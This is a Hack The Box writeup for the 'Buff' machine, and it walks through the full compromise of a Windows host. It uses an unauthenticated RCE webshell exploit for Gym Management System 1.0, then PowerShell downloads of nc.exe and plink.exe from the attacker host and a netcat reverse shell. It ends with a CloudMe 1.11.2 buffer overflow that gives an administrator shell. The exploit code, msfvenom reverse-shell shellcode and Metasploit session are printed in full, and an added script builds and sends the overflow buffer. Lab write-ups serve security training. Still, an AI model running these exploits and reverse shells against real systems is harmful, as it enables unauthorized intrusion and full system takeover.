Hack The Box - Buff Writeup
Enumeration
Add buff.htb to /etc/hosts and start an nmap scan.
Nmap
Nmap scan report for buff.htb (10.10.10.198)
Host is up, received user-set (0.35s latency).
Scanned at 2020-07-29 06:51:48 EDT for 1034s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT STATE SERVICE REASON VERSION
7680/tcp open pando-pub? syn-ack ttl 127
8080/tcp open http syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 364.31 ms 10.10.14.1
2 364.15 ms buff.htb (10.10.10.198)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 29 07:09:02 2020 -- 1 IP address (1 host up) scanned in 1035.77 seconds
We have two open ports. Port 7680 is used by Windows Update Delivery Optimization, and I did not find anything on it that can be leveraged.
Port 8080
A web application is hosted on port 8080. Browsing through the site, we can see that it is built with Gym Management System 1.0.
Searchsploit
A quick search with searchsploit gives an unauthenticated RCE exploit for the software. (Make sure your searchsploit database is up to date, e.g. with searchsploit -u.)
kali@kali:~/Desktop/htb/buff$ searchsploit gym Management
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
User Shell
Running the exploit (48506.py, saved here as web.py) gives us RCE through the webshell it uploads.
kali@kali:~/Desktop/htb/buff$ python web.py
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
(+) Usage: python web.py <WEBAPP_URL>
(+) Example: python web.py 'https://10.0.0.3:443/gym/'
kali@kali:~/Desktop/htb/buff$ python web.py http://buff.htb:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> dir
�PNG
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
02/08/2020 06:43 <DIR> .
02/08/2020 06:43 <DIR> ..
02/08/2020 06:43 53 kamehameha.php
1 File(s) 53 bytes
2 Dir(s) 9,423,310,848 bytes free
To get an interactive shell, we can transfer nc.exe to the box (served from a simple HTTP server on our machine) and use it to start a reverse shell. The �PNG at the top of every response is expected: the exploit writes a PNG magic-byte header in front of the PHP webshell it uploads, so the output of each command begins with those bytes.
C:\xampp\htdocs\gym\upload> powershell -command "invoke-webrequest -uri http://10.10.14.5:8000/nc64.exe -outfile nc.exe"
�PNG
C:\xampp\htdocs\gym\upload> powershell "C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.5 8081"
Start a listener on our machine beforehand to receive the connection.
kali@kali:~/Desktop/tools/win$ nc -nlvp 8081
listening on [any] 8081 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.198] 50245
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
02/08/2020 06:44 <DIR> .
02/08/2020 06:44 <DIR> ..
02/08/2020 06:43 53 kamehameha.php
02/08/2020 06:44 45,272 nc.exe
2 File(s) 45,325 bytes
2 Dir(s) 9,423,396,864 bytes free
Root Shell
Running winPEAS shows two services listening on the loopback interface only, on ports 3306 and 8888, which is why neither appeared in the nmap scan.
[+] Current Listening Ports(T1049&T1049)
[?] Check for services restricted from the outside
Proto Local Address Foreing Address State
TCP 127.0.0.1:3306 Listening
TCP 127.0.0.1:8888 Listening
Further analysis of the port showed that the service listening on port 8888 is CloudMe Sync. This software has a known stack buffer overflow, and searchsploit has a PoC for version 1.11.2.
kali@kali:~/Desktop/tools/autorecon/results/buff.htb/scans$ searchsploit cloudme
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
kali@kali:~/Desktop/tools/autorecon/results/buff.htb/scans$
First we need to create a tunnel from the Windows machine to our kali machine so that we can interact with the cloudme service, which is bound to 127.0.0.1 on the target and not reachable from outside. This can be accomplished using plink.exe from PuTTY with an SSH remote port forward (-R): plink logs in to the sshd on our kali box, kali starts listening on port 8888, and every connection to that port is relayed back through the SSH session to 127.0.0.1:8888 on the Windows host.
- Copy the plink.exe binary to the target.
- Start ssh on our system (sudo systemctl start ssh on kali).
- Connect the Windows machine's port to our system with plink -R.
C:\xampp\htdocs\gym\upload>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\gym\upload>invoke-webrequest -uri http://10.10.14.5:8000/plink.exe -outfile plink.exe
invoke-webrequest -uri http://10.10.14.5:8000/plink.exe -outfile plink.exe
PS C:\xampp\htdocs\gym\upload> dir
dir
Directory: C:\xampp\htdocs\gym\upload
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 02/08/2020 06:43 53 kamehameha.php
-a---- 02/08/2020 06:44 45272 nc.exe
-a---- 02/08/2020 06:48 675752 plink.exe
PS C:\xampp\htdocs\gym\upload> ./plink.exe kali@10.10.14.5 -R 8888:127.0.0.1:8888
./plink.exe kali@10.10.14.5 -R 8888:127.0.0.1:8888
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b:ab:04:68
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Using username "kali".
kali@10.10.14.5's password: **********
Linux kali 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 1 08:02:50 2020 from 10.10.14.2
kali@kali:~$
We can see the prompt of our system once the connection is established; for as long as this session stays open, port 8888 on kali forwards to the CloudMe service on the target. Now we can run the buffer overflow exploit.
- Create a msfvenom payload. The bad characters passed with -b are the ones the original PoC excludes (\x00, \x0a, \x0d), and -v payload names the variable so the output drops straight into the script.

kali@kali:~/Desktop/htb/buff$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=8082 -b "\x00\x0d\x0a" -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload =  b""
payload += b"\xbd\xaf\x84\x7b\x34\xda\xdb\xd9\x74\x24\xf4\x5f"
payload += b"\x2b\xc9\xb1\x52\x31\x6f\x12\x83\xef\xfc\x03\xc0"
payload += b"\x8a\x99\xc1\xe2\x7b\xdf\x2a\x1a\x7c\x80\xa3\xff"
payload += b"\x4d\x80\xd0\x74\xfd\x30\x92\xd8\xf2\xbb\xf6\xc8"
payload += b"\x81\xce\xde\xff\x22\x64\x39\xce\xb3\xd5\x79\x51"
payload += b"\x30\x24\xae\xb1\x09\xe7\xa3\xb0\x4e\x1a\x49\xe0"
payload += b"\x07\x50\xfc\x14\x23\x2c\x3d\x9f\x7f\xa0\x45\x7c"
payload += b"\x37\xc3\x64\xd3\x43\x9a\xa6\xd2\x80\x96\xee\xcc"
payload += b"\xc5\x93\xb9\x67\x3d\x6f\x38\xa1\x0f\x90\x97\x8c"
payload += b"\xbf\x63\xe9\xc9\x78\x9c\x9c\x23\x7b\x21\xa7\xf0"
payload += b"\x01\xfd\x22\xe2\xa2\x76\x94\xce\x53\x5a\x43\x85"
payload += b"\x58\x17\x07\xc1\x7c\xa6\xc4\x7a\x78\x23\xeb\xac"
payload += b"\x08\x77\xc8\x68\x50\x23\x71\x29\x3c\x82\x8e\x29"
payload += b"\x9f\x7b\x2b\x22\x32\x6f\x46\x69\x5b\x5c\x6b\x91"
payload += b"\x9b\xca\xfc\xe2\xa9\x55\x57\x6c\x82\x1e\x71\x6b"
payload += b"\xe5\x34\xc5\xe3\x18\xb7\x36\x2a\xdf\xe3\x66\x44"
payload += b"\xf6\x8b\xec\x94\xf7\x59\xa2\xc4\x57\x32\x03\xb4"
payload += b"\x17\xe2\xeb\xde\x97\xdd\x0c\xe1\x7d\x76\xa6\x18"
payload += b"\x16\x73\x3d\x2c\xe3\xeb\x43\x30\xf4\x79\xca\xd6"
payload += b"\x60\x6e\x9b\x41\x1d\x17\x86\x19\xbc\xd8\x1c\x64"
payload += b"\xfe\x53\x93\x99\xb1\x93\xde\x89\x26\x54\x95\xf3"
payload += b"\xe1\x6b\x03\x9b\x6e\xf9\xc8\x5b\xf8\xe2\x46\x0c"
payload += b"\xad\xd5\x9e\xd8\x43\x4f\x09\xfe\x99\x09\x72\xba"
payload += b"\x45\xea\x7d\x43\x0b\x56\x5a\x53\xd5\x57\xe6\x07"
payload += b"\x89\x01\xb0\xf1\x6f\xf8\x72\xab\x39\x57\xdd\x3b"
payload += b"\xbf\x9b\xde\x3d\xc0\xf1\xa8\xa1\x71\xac\xec\xde"
payload += b"\xbe\x38\xf9\xa7\xa2\xd8\x06\x72\x67\xe8\x4c\xde"
payload += b"\xce\x61\x09\x8b\x52\xec\xaa\x66\x90\x09\x29\x82"
payload += b"\x69\xee\x31\xe7\x6c\xaa\xf5\x14\x1d\xa3\x93\x1a"
payload += b"\xb2\xc4\xb1"
- Replace the payload in the exploit (windows/remote/48389.py) with the one msfvenom generated. Two things to watch: target stays 127.0.0.1, because the plink tunnel forwards our local port 8888 to the CloudMe listener on the target, and the original PoC ends with print(sys.exc_value), which is Python 2 only and never imports sys; the copy below prints the caught exception directly so it runs under Python 3 as well.

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

# reached through the plink -R 8888:127.0.0.1:8888 tunnel
target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP      = b"\xB5\x42\xA8\x68"   # 0x68A842B5 -> PUSH ESP, RET
NOPS     = b"\x90" * 30

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=8082 -b "\x00\x0d\x0a" -f python -v payload
payload =  b""
payload += b"\xbd\xaf\x84\x7b\x34\xda\xdb\xd9\x74\x24\xf4\x5f"
payload += b"\x2b\xc9\xb1\x52\x31\x6f\x12\x83\xef\xfc\x03\xc0"
payload += b"\x8a\x99\xc1\xe2\x7b\xdf\x2a\x1a\x7c\x80\xa3\xff"
payload += b"\x4d\x80\xd0\x74\xfd\x30\x92\xd8\xf2\xbb\xf6\xc8"
payload += b"\x81\xce\xde\xff\x22\x64\x39\xce\xb3\xd5\x79\x51"
payload += b"\x30\x24\xae\xb1\x09\xe7\xa3\xb0\x4e\x1a\x49\xe0"
payload += b"\x07\x50\xfc\x14\x23\x2c\x3d\x9f\x7f\xa0\x45\x7c"
payload += b"\x37\xc3\x64\xd3\x43\x9a\xa6\xd2\x80\x96\xee\xcc"
payload += b"\xc5\x93\xb9\x67\x3d\x6f\x38\xa1\x0f\x90\x97\x8c"
payload += b"\xbf\x63\xe9\xc9\x78\x9c\x9c\x23\x7b\x21\xa7\xf0"
payload += b"\x01\xfd\x22\xe2\xa2\x76\x94\xce\x53\x5a\x43\x85"
payload += b"\x58\x17\x07\xc1\x7c\xa6\xc4\x7a\x78\x23\xeb\xac"
payload += b"\x08\x77\xc8\x68\x50\x23\x71\x29\x3c\x82\x8e\x29"
payload += b"\x9f\x7b\x2b\x22\x32\x6f\x46\x69\x5b\x5c\x6b\x91"
payload += b"\x9b\xca\xfc\xe2\xa9\x55\x57\x6c\x82\x1e\x71\x6b"
payload += b"\xe5\x34\xc5\xe3\x18\xb7\x36\x2a\xdf\xe3\x66\x44"
payload += b"\xf6\x8b\xec\x94\xf7\x59\xa2\xc4\x57\x32\x03\xb4"
payload += b"\x17\xe2\xeb\xde\x97\xdd\x0c\xe1\x7d\x76\xa6\x18"
payload += b"\x16\x73\x3d\x2c\xe3\xeb\x43\x30\xf4\x79\xca\xd6"
payload += b"\x60\x6e\x9b\x41\x1d\x17\x86\x19\xbc\xd8\x1c\x64"
payload += b"\xfe\x53\x93\x99\xb1\x93\xde\x89\x26\x54\x95\xf3"
payload += b"\xe1\x6b\x03\x9b\x6e\xf9\xc8\x5b\xf8\xe2\x46\x0c"
payload += b"\xad\xd5\x9e\xd8\x43\x4f\x09\xfe\x99\x09\x72\xba"
payload += b"\x45\xea\x7d\x43\x0b\x56\x5a\x53\xd5\x57\xe6\x07"
payload += b"\x89\x01\xb0\xf1\x6f\xf8\x72\xab\x39\x57\xdd\x3b"
payload += b"\xbf\x9b\xde\x3d\xc0\xf1\xa8\xa1\x71\xac\xec\xde"
payload += b"\xbe\x38\xf9\xa7\xa2\xd8\x06\x72\x67\xe8\x4c\xde"
payload += b"\xce\x61\x09\x8b\x52\xec\xaa\x66\x90\x09\x29\x82"
payload += b"\x69\xee\x31\xe7\x6c\xaa\xf5\x14\x1d\xa3\x93\x1a"
payload += b"\xb2\xc4\xb1"

# pad the whole thing out to 1500 bytes
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    print(e)
- Start a msf listener and run the exploit. The handler's payload has to match what msfvenom produced: msfvenom generated the stageless windows/shell_reverse_tcp, so the staged windows/shell/reverse_tcp handler set first is the wrong one (it would try to push a second stage to a plain cmd.exe shell); it was interrupted and swapped for windows/shell_reverse_tcp before the exploit was sent.

kali@kali:~/Desktop/htb/buff$ sudo msfconsole
[sudo] password for kali:
       =[ metasploit v5.0.97-dev                          ]
+ -- --=[ 2043 exploits - 1105 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with irb

msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf5 exploit(multi/handler) > set lport 8082
lport => 8082
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:8082
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:8082
[*] Command shell session 1 opened (10.10.14.5:8082 -> 10.10.10.198:50263) at 2020-08-02 02:08:38 -0400

(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator
And we are root!
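As an added example (written for this page; it is not part of the original writeup or of the Exploit-DB PoC), the following rebuilds the PoC's buffer layout in a form that can be checked before it is fired: the gadget address is packed with struct instead of being typed as a byte string by hand, the shellcode is screened for the bad characters msfvenom was told to avoid, and the buffer is padded to exactly 1500 bytes or the script refuses to send. The offset (1052), gadget (0x68A842B5) and NOP-sled length (30) are the PoC's values; the INT3 placeholder shellcode is constructed so the block runs offline and must be replaced with the msfvenom output before use.

```python
import socket
import struct

# Layout of the CloudMe 1.11.2 PoC used above (all three values taken from it):
# 1052 bytes of filler reach the saved return address, which is overwritten with
# the address of a PUSH ESP; RET gadget, so execution lands in the NOP sled that
# sits right after the overwritten address and slides into the shellcode.
OFFSET_TO_EIP = 1052
GADGET_PUSH_ESP_RET = 0x68A842B5
NOP_SLED_LEN = 30
TOTAL_LEN = 1500
BAD_CHARS = b"\x00\x0d\x0a"   # the -b set handed to msfvenom on this page

# Constructed placeholder so the block runs offline: eight INT3 breakpoints, not a
# real payload. Replace with the bytes msfvenom printed (-f python -v payload).
payload = b"\xcc" * 8


def find_bad_chars(shellcode, bad_chars=BAD_CHARS):
    """Return the set of forbidden byte values that actually occur in shellcode."""
    return {b for b in bad_chars if b in shellcode}


def build_buffer(shellcode, offset=OFFSET_TO_EIP, gadget=GADGET_PUSH_ESP_RET,
                 nop_len=NOP_SLED_LEN, total=TOTAL_LEN, bad_chars=BAD_CHARS):
    """Assemble filler | EIP | NOP sled | shellcode | padding, exactly `total` bytes.

    Raises ValueError rather than sending a buffer that cannot work: a bad char in
    the shellcode or in the packed address, or a payload that does not fit.
    """
    found = find_bad_chars(shellcode, bad_chars)
    if found:
        raise ValueError("shellcode contains bad chars: %s"
                         % ", ".join("0x%02x" % b for b in sorted(found)))
    # Little-endian packing yields the same bytes the PoC hard-codes as
    # b"\xB5\x42\xA8\x68"; packing avoids a byte-order slip when the address changes.
    eip = struct.pack("<I", gadget)
    if find_bad_chars(eip, bad_chars):
        raise ValueError("gadget address 0x%08x contains a bad char" % gadget)
    body = b"\x90" * offset + eip + b"\x90" * nop_len + shellcode
    if len(body) > total:
        raise ValueError("%d-byte shellcode does not fit: %d bytes over"
                         % (len(shellcode), len(body) - total))
    return body + b"C" * (total - len(body))


def shellcode_start(offset=OFFSET_TO_EIP, nop_len=NOP_SLED_LEN):
    """Index in the buffer where the shellcode begins (after EIP and the sled)."""
    return offset + 4 + nop_len


def send_buffer(buf, host="127.0.0.1", port=8888, timeout=5.0):
    """Deliver the buffer. 127.0.0.1 is correct while the writeup's
    plink -R 8888:127.0.0.1:8888 tunnel is up: kali's local 8888 is relayed to
    CloudMe on the target. Returns the number of bytes handed to the socket."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(buf)
    return len(buf)


if __name__ == "__main__":
    buf = build_buffer(payload)
    print("buffer: %d bytes, EIP at %d, shellcode at %d"
          % (len(buf), OFFSET_TO_EIP, shellcode_start()))
    try:
        send_buffer(buf)
    except OSError as exc:          # no tunnel up, or CloudMe not listening
        print("send failed: %s" % exc)
```

build_buffer() is pure, so the layout can be inspected in a REPL (for example buf[1052:1056] must read b"\xb5\x42\xa8\x68") before anything touches the tunnel; send_buffer() only connects when called.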
Notes
The buffer overflow method can also be executed without plink: we can convert the python script to a standalone exe and execute it on the Windows machine to get root. In that case target stays 127.0.0.1 as well, since the script then runs on the same host as CloudMe.